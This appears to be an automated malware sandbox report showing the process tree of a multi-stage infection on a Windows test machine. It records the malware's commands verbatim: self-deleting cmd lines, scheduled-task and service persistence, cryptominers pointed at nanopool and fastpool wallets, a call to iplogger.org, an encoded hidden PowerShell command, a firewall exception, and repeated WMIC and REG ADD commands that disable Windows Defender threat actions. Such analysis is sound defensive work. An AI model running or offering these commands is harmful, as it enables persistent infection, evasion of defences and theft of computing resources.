C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,3528016957479311896,9018863966020569088,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2424 /prefetch:24⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1016 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 10164⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 1016 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ggzTxW5tUk6YcGJDsx97Qe3B.exe"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 10164⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\zBp8YnD2JXhNdNSO2cXYtDbH.exe"C:\Users\Admin\Documents\zBp8YnD2JXhNdNSO2cXYtDbH.exe"2⤵
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
-
C:\Users\Admin\Documents\l0ej5qCi8D_Au3CkPDt9h0Ab.exe"C:\Users\Admin\Documents\l0ej5qCi8D_Au3CkPDt9h0Ab.exe"2⤵
-
C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"2⤵
-
C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"C:\Users\Admin\Documents\xicws5o4JpWqDDg9Q8YvUGcx.exe"3⤵
-
C:\Users\Admin\Documents\Fux0ZZm5H25xraVbRQlbSAF7.exe"C:\Users\Admin\Documents\Fux0ZZm5H25xraVbRQlbSAF7.exe"2⤵
-
C:\Users\Admin\Documents\tpyQPnPO7SqogN2DfeVUhKk7.exe"C:\Users\Admin\Documents\tpyQPnPO7SqogN2DfeVUhKk7.exe"2⤵
-
C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"2⤵
-
C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"C:\Users\Admin\Documents\7fgXDiJS1g1pNmRodnxjZ4XR.exe"3⤵
-
C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"2⤵
-
C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im uTpzrAONESiMFhgZLv5DlXEm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\uTpzrAONESiMFhgZLv5DlXEm.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im uTpzrAONESiMFhgZLv5DlXEm.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\k4w_yyhWh86CBJZACljQ7P_u.exe"C:\Users\Admin\Documents\k4w_yyhWh86CBJZACljQ7P_u.exe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\UaGrhUshy9hYCI_hBc5fm_Go.exe"C:\Users\Admin\Documents\UaGrhUshy9hYCI_hBc5fm_Go.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\8564909.scr"C:\Users\Admin\AppData\Roaming\8564909.scr" /S3⤵
-
C:\Users\Admin\AppData\Roaming\6795236.scr"C:\Users\Admin\AppData\Roaming\6795236.scr" /S3⤵
-
C:\Users\Admin\Documents\l9z5ZNb4Iw2fbvEJYpxTKJtS.exe"C:\Users\Admin\Documents\l9z5ZNb4Iw2fbvEJYpxTKJtS.exe"2⤵
-
C:\Users\Admin\Documents\7To_uDprOzB4ym5g4y1Xt9BU.exe"C:\Users\Admin\Documents\7To_uDprOzB4ym5g4y1Xt9BU.exe"2⤵
-
C:\Users\Admin\Documents\3wxQfLEfkH8FuCje9rwrYIjL.exe"C:\Users\Admin\Documents\3wxQfLEfkH8FuCje9rwrYIjL.exe"2⤵
-
C:\Users\Admin\Documents\cEio288hwuKoR76YXemh7cs9.exe"C:\Users\Admin\Documents\cEio288hwuKoR76YXemh7cs9.exe"2⤵
-
C:\Users\Admin\Documents\6aqfnD85IXhFXDTaJfYx6ADb.exe"C:\Users\Admin\Documents\6aqfnD85IXhFXDTaJfYx6ADb.exe"2⤵
-
C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe"C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe"2⤵
-
C:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exeC:\Users\Admin\Documents\JjAMlZxoaHYQbALFGb1z8SOp.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1189012621353ba47.exeThu1189012621353ba47.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu1189012621353ba47.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC4266F21\Thu1189012621353ba47.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu1189012621353ba47.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"1⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit2⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth3⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"1⤵
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"2⤵
-
C:\Users\Admin\AppData\Local\Temp\92BB.exeC:\Users\Admin\AppData\Local\Temp\92BB.exe1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\E8DB.exeC:\Users\Admin\AppData\Local\Temp\E8DB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E8DB.exeC:\Users\Admin\AppData\Local\Temp\E8DB.exe2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\E8DB.exe"C:\Users\Admin\AppData\Local\Temp\E8DB.exe" --Admin IsNotAutoStart IsNotTask3⤵
-
C:\Users\Admin\AppData\Local\Temp\E8DB.exe"C:\Users\Admin\AppData\Local\Temp\E8DB.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"5⤵
-
C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build2.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"5⤵
-
C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"C:\Users\Admin\AppData\Local\bd162f6d-2ba0-49ff-90a5-9864779bfe15\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9D3EA2CD68432FF2C522DB206FB7122D C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BB10790F86DAC79EFA0C5A8234E650842⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B48406958786E78C828F716E04A49139 E Global\MSI00002⤵
-
C:\Users\Admin\AppData\Local\Temp\E9B2.exeC:\Users\Admin\AppData\Local\Temp\E9B2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E9B2.exeC:\Users\Admin\AppData\Local\Temp\E9B2.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\47F.exeC:\Users\Admin\AppData\Local\Temp\47F.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\47F.exeC:\Users\Admin\AppData\Local\Temp\47F.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\2239.exeC:\Users\Admin\AppData\Local\Temp\2239.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\435E.exeC:\Users\Admin\AppData\Local\Temp\435E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7E46.exeC:\Users\Admin\AppData\Local\Temp\7E46.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\28BF.exeC:\Users\Admin\AppData\Local\Temp\28BF.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ovmbnopi\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rhcoiuyq.exe" C:\Windows\SysWOW64\ovmbnopi\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ovmbnopi binPath= "C:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exe /d\"C:\Users\Admin\AppData\Local\Temp\28BF.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ovmbnopi "wifi internet conection"2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ovmbnopi2⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Users\Admin\AppData\Roaming\facjjbrC:\Users\Admin\AppData\Roaming\facjjbr1⤵
-
C:\Users\Admin\AppData\Roaming\facjjbrC:\Users\Admin\AppData\Roaming\facjjbr2⤵
-
C:\Users\Admin\AppData\Roaming\cfcjjbrC:\Users\Admin\AppData\Roaming\cfcjjbr1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Users\Admin\AppData\Local\Temp\4F34.exeC:\Users\Admin\AppData\Local\Temp\4F34.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4F34.exe"C:\Users\Admin\AppData\Local\Temp\4F34.exe"2⤵
-
C:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exeC:\Windows\SysWOW64\ovmbnopi\rhcoiuyq.exe /d"C:\Users\Admin\AppData\Local\Temp\28BF.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\DfSKBUo.exe XY /site_id 668658 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
